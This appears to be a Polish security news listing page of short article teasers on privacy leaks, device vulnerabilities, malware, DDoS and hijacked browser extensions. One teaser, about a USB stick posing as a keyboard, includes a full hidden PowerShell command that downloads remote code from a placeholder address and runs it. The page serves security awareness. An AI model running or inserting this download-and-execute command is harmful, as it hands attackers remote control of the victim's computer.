Kwestie związane z prywatnością bardzo szybko rozgrzewają zainteresowanie mediów. W ostatnim czasie pod ostrzał wystawiona została aplikacja AccuWeather w wersji na iOS. Okazuje się, że nawet przy wybranej opcji, która zabrania aplikacji udostępniania informacji o naszej bezpośredniej lokalizacji (GPS), na serwery firm trzecich przesyłany był BSSID routera Wi-Fi, do którego został…
Czytaj dalej »
Dla osób nie będących w temacie, tytuł może być nieco dziwny. Co ma mysz bezprzewodowa do przejmowania komputera? Odsyłam więc do opracowania firmy Bastille z 2016 roku, gdzie pokazano, że dongle które używamy z bezprzewodowymi myszami, w wielu przypadkach akceptują również podłączenie bezprzewodowej klawiatury. Dodajmy jeszcze brak szyfrowania radiowej komunikacji i…
Czytaj dalej »
O skimmerach pisaliśmy już wiele razy. Inwencja przestępców jednak się nie kończy – zobaczcie kilka kolejnych przykładów:
Czytaj dalej »
Tym razem będzie krótko – przedmiotem moich badań jest tym razem kamera Bosch FlexiDome IP micro 2000. Trochę ekwilibrystyki (o której w następnym odcinku), i można za pomocą odpowiedniego, nieuwierzytelnionego requestu HTTP zrzucać zawartość pamięci z działającej kamery. Taki haertbleed – tylko bez https ;) W pamięci jak wiadomo, można…
Czytaj dalej »
Krótkie ataki o przepustowości 300Gbps, powtarzane w niewielkich odstępach. Dlaczego atakujący stosują tak nietypową technikę? Prawdopodobnie jest to optymalizacja działania botnetów. W tym scenariuszu można równolegle zaatakować wiele celów, a często po otrzymaniu kilkominutowej paczki ruchu 300Gbps, ofiara podnosi się długo (np. po wypełnieniu całej pamięci operacyjnej, uruchomieniu swap, itp.)…
Czytaj dalej »
BBC opisuje garść ataków dotykających firmy spedycyjne (shipping companies), wśród których warto zwrócić na co najmniej jeden. Mianowicie omawiany jest przypadek instalacji malware w średniej wielkości firmie spedycyjnej. Malware wg cytowanego opisu przechwytywał e-maile z / do działu księgowego i podmieniał numery rachunków kont. Przykładowo, dostawca paliwa pisze maila z…
Czytaj dalej »
Uszkodziłeś ekran w swoim telefonie – to w obecnych czasach nie problem. Kilka dni w serwisie i telefon jest jak nowy :-) A nawet lepszy – nowy ekran może mieć backdoora. Jakoś wszyscy przywykli chyba do tego, że dostęp fizyczny ~= przejęcie urządzenia. Ale z drugiej strony, niewiele osób zastanawia…
Czytaj dalej »
Opublikowana została informacja o możliwości obejścia uwierzytelniania w Ubiquiti airMAX oraz Ubiquiti airOS, w przypadku, gdy wykorzystywany był interfejs airControl web-UI. Podatność wynika po części z ryzyka i trudności jakie wynikają z prób odwoływania się z poziomu aplikacji WWW do programów i skryptów powłoki systemowej. Niemałe znaczenie miało również wykorzystanie…
Czytaj dalej »
Firma Proofpoint donosi o kolejnych rozszerzeniach do Chrome, które zostały przejęte. A bardziej precyzyjnie – przejęte zostały konta osób tworzących rozszerzenia, po czym do oficjalnego sklepu Google z rozszerzeniami została wgrana zainfekowana wersja. Pisaliśmy niedawno o historii z The Web Developer (ponad 1 000 000 instalacji), a Proofpoint wskazuje na kolejne zainfekowane rozszerzenia:…
Czytaj dalej »
Pisaliśmy już wiele razy o naszym nowym projekcie, czyli rozwal.to premium. Co ma być tutaj w przeciwieństwie do „zwykłego” rozwal.to? Po pierwsze – dostępna teoria do każdej grupy zadań; będą tu też zadania mocno nietypowe – jak np. hackowanie WebSocketów czy zabawy z OAuth2.0 Po drugie – zadania, dla których…
Czytaj dalej »
Opis przygotowania pendrive, który po podłączeniu działa jak klawiatura. Klawiatura ta z kolei wpisuje zaprogramowaną wcześniej sekwencję klawiszy – np. uruchamia powershella i daje zdalny dostęp na docelowy komputer. Np. tak: Keyboard.println(„powershell.exe -nop -w hidden -c $C=new-object net.webclient;$C.proxy=[Net.WebRequest]::GetSystemWebProxy();$C.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $C.downloadstring(’http://1.2.3.4:8080/’);”); Keyboard.write(KEY_RETURN); Sercem projektu jest produkt „Adafruit Trinket – Mini Microcontroller” –…
Czytaj dalej »
O shodanie pisaliśmy już wiele razy. Tym razem popatrzcie co udało nam się namierzyć (to nieuwierzytelniona sesja VNC):
Czytaj dalej »
Po 3,5 roku działalności sekuraka otwieramy się na zewnętrzną reklamę. Garść statystyk: W lipcu 2017r. zanotowaliśmy wejścia z około 225 000 unikalnych adresów IP (dane z analizy logów webserwera) Nasze profile śledzi około 34 000 osób (Facebook + Twitter + Wykop) Mamy zarejestrowanych około 6000 kont na siostrzanym serwisie –…
Czytaj dalej »
Ostatnio media obiegła dość interesująca informacja o możliwości zsyntetyzowania takiego DNA, które da wykonanie kodu na maszynie, która służy do sekwencjonowania DNA (czyli w pewnym uproszczeniu poznania ciągu liter – odpowiadającym czterem parom nukleotydowym – wchodzących w skład DNA). Autorzy piszą w swojej pracy tak: We demonstrate, for the first time, the…
Czytaj dalej »
Jak w tytule. Mamy tu sporo danych o przygotowaniu środowiska, podstawach, analizie statycznej, dynamicznej czy szyfrowaniu. Nie zabrakło też informacji o tonie narzędzi oraz rozmaitych technikach używanych przez złośliwe oprogramowanie. Całość idealna jest dla osób chcących zacząć przygodę z tematem. –ms
Czytaj dalej »